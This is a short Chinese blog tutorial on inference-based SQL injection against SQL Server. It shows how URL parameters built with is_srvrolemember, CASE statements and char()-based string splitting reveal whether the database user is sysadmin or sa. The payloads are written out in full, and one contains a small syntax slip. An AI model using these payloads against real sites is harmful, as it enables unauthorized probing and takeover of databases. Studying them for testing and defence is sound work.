SQL注入(3)

最新推荐文章于 2022-03-22 15:13:12 发布
最新推荐文章于 2022-03-22 15:13:12 发布
阅读量468 收藏
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41007744/article/details/80199592
版权

SQL注入基于错误查询

is_srvrolemember()是一个SQL Server T-SQL函数,返回值:

1: 如果用户属于指定的组

0: 如果用户不属于指定的组

NULL: 如果指定的组不存在

?id=12/is_srvrolemember('sysadmin')
如果用户属于sysadmin组,那么id参数等于12/1返回正常的页面

case语句

case when condition then action1 else action2 end

?id=12/(case when (system_user='sa') then 1 else 0 end)

处理字符串

?brand=acme

后台数据库执行以下查询

select * from products where brand='acme'
?brand=acm'%2B'e

%2B是加号+的url编码最终查询等价于

select * from products where brand='acm'+'e'
html页面不会变化

也可以将参数分成三个部分

?brand=ac'%2B'm'%2B'e

使用char()函数修改

?brand=ac'%2Bchar(109)%2B'e

于是就有了一个可控的数字参数

?brand=ac'%2Bchar(108%2B(case+when+(system_user+=+'sa')+when+1+else+0+end)%2B'e

于是最终查询就变成

select * from peoducts where brand='ac'+char(108+(case when(system_user='sa') then 1 else 0 end)+'e'
如果用户为sa返回原画面
张Mini
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2094
Mssql即Sql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
SQLServer数据库注入详解
weixin_50464560的博客
07-20 823
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 SA权限使用CLR执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 延时...
sqlserver数据库布尔盲注_dba安全测试必备:SQL SERVER数据库手工延时盲注语句
weixin_42517807的博客
12-24 455
假设存在一个PHP+SQL SERVER的环境,存在POST注入,只能进行延时盲注,存在防火墙,Sqlmap能够绕过,但不能注入,手工注入语句如下:0x1:判断是否存在注入:#inject为注入点,--OwlXXpFshm%0A绕过WAF,替换空格为注释+回车#如果存在注入,返回的数据包将延时5秒以上inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0...
SQL Server 注入
mingyqf的博客
03-22 2399
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入讲解ppt.pptx
08-10
3. 时间延迟型 SQL 注入:使用时间延迟来注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
手工MSSQL注入常用SQL语句
weixin_34290390的博客
08-31 143
备用 and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(...
查询数据库系统信息
dmz1981的专栏
08-23 643
select user select db_name() select @@version select system_user select is_srvrolemember('sysadmin')
在Sql Server中监视到的语句
weixin_30323961的博客
01-17 191
在Sql Server中监视到的语句select is_srvrolemember('sysadmin') * 1 +is_srvrolemember('serveradmin') * 2 +is_srvrolemember('setupadmin') * 4 +is_srvrolemember('securityadmin') * 8 +is_srvrolemember('processad...
MSSQL手工注入语句积累
CC's Blog
11-19 1784
网上别人整理的语句,留个Copy and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当
sql server 2000 sa 的密码修改
ITfishing的专栏
05-10 878
1、在查询分析器中先创建存储过程: create procedure sp_password     @old sysname = NULL,        -- the old (current) password     @new sysname,               -- the new password     @loginame sysname = NULL    -
WEB 安全之 SQL注入 < 二 > 暴库
06-19 91
接着上篇,还是新闻发布系统,上篇演示的盲注,其实还有更简单的办法。上篇是从新闻详细页面入侵成功,在下面的测试中入侵者发现新闻列表页面也存在相同的漏洞,呵呵呵,貌似从这里入侵更方便些。 这里测试环境跟上一篇相同, MSQL + asp.net 。新闻列表页面代码如下: protected void Page_Load(object sender, Eve...
从零开始web
ACdream
04-15 578
web
SQL server手工注入学习笔记
愚者
05-07 8537
MSSQL注入(SQL server) 由于这学期正在学数据库,所以理解SQL语句还是可疑的。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。 一:判断是否有注入 and 1=1 and 1=2 判断注入的方法是一样的 二:初步判断是否是MSSQL and user>0 三:判断数据库系统 and (select count(*) fro
SQLserver安全设置攻略
aome1470的博客
03-21 211
日前SQLINJECTION的攻击测试愈演愈烈,很多大型的网站和论坛都相继被注入。这些网站一般使用的多为SQLSERVER数据库,正因为如此,很多人开始怀疑SQLSERVER的安全性。其实SQLSERVER2000已经通过了美国政府的C2级安全认证-这是该行业所能拥有的最高认证级别,所以使用SQLSERVER还是相当的安全的。当然和ORCAL、DB2等还是有差距,但是SQLSER...
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值